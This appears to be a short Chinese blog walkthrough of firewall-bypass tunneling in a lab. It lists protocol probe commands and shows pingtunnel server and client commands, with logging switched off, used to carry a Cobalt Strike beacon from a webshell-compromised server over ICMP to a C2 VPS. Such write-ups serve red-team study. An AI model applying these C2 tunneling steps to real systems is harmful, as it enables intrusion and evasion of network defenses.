常用的隧道技术:
利用各种隧道技术,以网络防火墙允许的协议,
绕过网络防火墙的封锁,实现访问被封锁的目标网络
网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道
协议 判断命令
ICMP ping ip or domain
HTTP curl ip or domain
SSH ssh ip or domain
DNS nslookup domain
TCP telnet ip port
… …………….
环境准备
本机作为攻击机,一台vps作为C2服务器,以及隧道服务端。
靶机使用一台云服务器,开启防火墙。
出站入站规则全部禁止,入站规则中添加web,允许访问80端口。
出站规则中允许ICMP
使用webshell连接web服务器。首先直接上传CS后门执行发现无法上线,之后信息收集,得到出网协议为ICMP。
隧道搭建
相关项目 https://github.com/esrrhs/pingtunnel
首先将工具上传至VPS启动服务端
./pingtunnel -type server
之后将工具通过webshell上传,在客户端启动
pingtunnel -type client -l :3333 -s x.x.x.x -t x.x.x.x:4444 -tcp 1 -noprint 1 -nolog 1
这条命令中,-l后的端口为本机端口,-s后为服务端IP,-t后为服务端地址以及端口。
之后连接成功后,服务端会有结果返回。
在CS中需要新建两个监听器,一个监听器监听本机的地址端口,需要使用这个监听器生成后门,之后上传运行。
因为流量为HTTP,经过隧道转发后到了VPS上服务端的相关端口上,所以监听对应的端口。
之后执行发现可以上线。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
相关文章
暂无评论...